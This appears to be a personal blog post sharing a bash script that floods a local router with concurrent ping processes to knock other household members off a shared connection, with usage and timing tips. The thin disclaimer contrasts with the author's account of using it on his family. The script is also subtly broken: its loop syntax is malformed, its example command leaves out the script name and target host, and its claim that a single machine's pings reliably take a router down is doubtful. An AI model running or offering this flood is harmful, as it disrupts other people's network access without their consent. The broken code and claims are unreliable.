Shell Script for Launching a Local Denial-of-Service Attack

Disclaimer: The following article is written for entertainment and educational purposes only. Neither the script shown here nor any of the techniques involved are intended to be used in real life. Launching denial-of-service attacks is illegal and can get you in serious trouble. I do not condone or support any use of such hacking methods for anything other than pen-testing purposes.

Haven’t written anything about either pen-testing or Linux shell scripting recently, so I thought I’d share a neat script I wrote several years ago that I used to use quite frequently. Back when I was a young whippersnapper in my early twenties and living with my parents in a house with a crappy Internet connection, I used to fight endlessly with my family members over bandwidth. Not in the sense that I was arguing with them over it, but in the sense that I was launching covert attacks to kick them off the network so that I could get more bandwidth for myself. It could get annoying trying to connect to a site while someone else was hogging all the bandwidth by streaming video in another room, so I thought why not disrupt their connection so that I would be allowed through?

The following script works by launching a denial-of-service attack against the local router. It sends a timed ping flood which overloads the router and causes it to go temporarily offline, effectively kicking everyone else off the network. The script will wait for a certain duration and then stop the ping flood, and at this point you’ll be able to get a request through because you’ll be the only one on the network. I know ping flooding has been rendered largely obsolete by the introduction of better DDoS protection with services like CloudFlare, but the attack I devised should still work, because there is no DDoS protection built into small home routers.

The script looks like this (just remember that I don’t condone anyone using it IRL):

 1 #!/usr/bin/env bash
 2 # Local denial-of-service script
 4 host="$1"
 5 shift
 6 declare -i npings=50
 7 declare -i duration=5
 9 # Set parameters:
10 while getopts ":n:t:" opt
11 do
12         case $opt in
13           n) let npings=$OPTARG;;
14           t) let duration=$OPTARG;;
15           \?) echo "Usage: source host [-n npings] [-t duration]" >&2;;
16         esac
17 done
19 # Launch DoS attack:
20 for (( i=0$i<$npings; i++ ))
21 do
22         ping "$host" > /dev/null &
23 done
25 # Wait and stop attack:
26 sleep $duration
27 killall ping
29 # Cleanup:
30 unset opt i host npings duration

The way this script would be used would be to run it at the command line with a command like this:

$ source -n 50 -t 5

Then wait $duration seconds for the prompt to reappear, then do whatever you want to do on the network. ($host should ideally be the IP address of the local WiFi router; I just used a common default gateway address as an example. Since it’s a local IP address, you can’t actually use it to attack anyone on the Internet.)

I know I could have used the -c $duration option here, but if you were to actually use this in real life (which, again, I’m not suggesting anyone do) you would quickly discover a problem if this method is used, which is that you wouldn’t be alerted when the ping flood is finished, so you wouldn’t know the proper time to put your Internet request through. Using killall makes things easier, because you can just wait for the prompt to reappear.

Well, that’s about all for today. This article was a little shorter and less involved than what I usually do, but I think it was a good break from routine. Farewell and happy hacking!


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s